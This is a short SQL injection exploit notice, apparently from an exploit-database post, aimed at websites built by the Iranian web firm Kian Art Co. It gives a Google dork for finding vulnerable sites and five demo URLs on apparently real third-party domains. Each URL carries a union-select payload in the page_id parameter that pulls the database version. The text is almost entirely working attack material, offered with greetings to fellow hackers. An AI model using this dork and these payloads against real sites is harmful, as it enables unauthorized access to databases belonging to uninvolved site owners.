############################################################################ # Exploit Title: Kian Art Co. SQL Injection # Date: 28/01/2014 # Exploit Author: Wild Wolves Team # Vendor Homepage: http://www.kian-art.ir/ # Tested on: Win XP,Linux ############################################################################ # Google Dork: intext:"Kian Art Co." inurl:"page.php?page_id=" ############################################################################ # DemO: http://www.agXnesarshadi.ir/page.php?page_id=-28%27+union+select+1,2,version(),4,5,6--+ # DemO: http://cashcoXul.com/page.php?page_id=-28%27+union+select+1,2,version(),4,5,6--+ # DemO: http://alborzgXps.com/page.php?page_id=-60%27+union+select+1,2,version(),4,5,6--+ # DemO: http://www.banXkeloole.com/page.php?page_id=-28%27+union+select+1,2,version(),4,5,6--+ # DemO: http://www.bgaXco.ir/page.php?page_id=-28%27+union+select+1,2,version(),4,5,6--+ ############################################################################ # Special Tnx: Sub0Hack And All Hidden Name! ############################################################################ # The Last One : My Self, R3veC0der ############################################################################